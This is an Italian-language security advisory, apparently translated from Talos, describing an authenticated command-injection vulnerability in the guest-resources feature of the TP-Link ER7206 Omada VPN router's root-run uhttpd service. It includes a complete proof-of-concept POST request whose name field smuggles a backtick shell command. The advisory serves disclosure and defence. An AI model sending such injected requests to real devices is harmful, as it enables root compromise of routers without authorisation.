
Vulnerabilità di command injection in TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Vulnerabilità di iniezione di comandi
Esiste una vulnerabilità di esecuzione di comandi nella funzionalità delle risorse ospiti (guest resources) di Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. Una richiesta HTTP appositamente predisposta può portare all'esecuzione arbitraria di comandi. Un attaccante può effettuare una richiesta HTTP autenticata per attivare questa vulnerabilità.
Le versioni elencate di seguito sono state testate o verificate come vulnerabili da Talos oppure confermate come vulnerabili dal produttore.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
Il router VPN gigabit Omada ER7206 è una soluzione di rete ad alte prestazioni che supporta la connettività gigabit, VPN altamente sicure e l'integrazione con Omada SDN per la gestione centralizzata nel cloud e il provisioning zero-touch.
Il router VPN gigabit Omada ER7206 esegue vari servizi per gestire il router o i dispositivi collegati ad esso. Uno di questi servizi è uhttpd, che gira sulle porte 80/443. Offre agli utenti un'interfaccia web per configurare e gestire il router. Per impostazione predefinita, il servizio viene eseguito come utente root. Un attaccante può ottenere accesso root al dispositivo sfruttando questo servizio.
Una vulnerabilità di iniezione di comandi esiste nel servizio uhttpd quando una risorsa ospite (guest resource) viene aggiunta al dispositivo. Nell'interfaccia web, la pagina delle risorse ospiti può essere raggiunta navigando su Authentication -> Authentication Settings -> Guest Resources. Contiene funzionalità per aggiungere, modificare ed eliminare le risorse ospiti. Quando viene aggiunta una risorsa ospite, viene attivata la seguente richiesta HTTP POST:
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D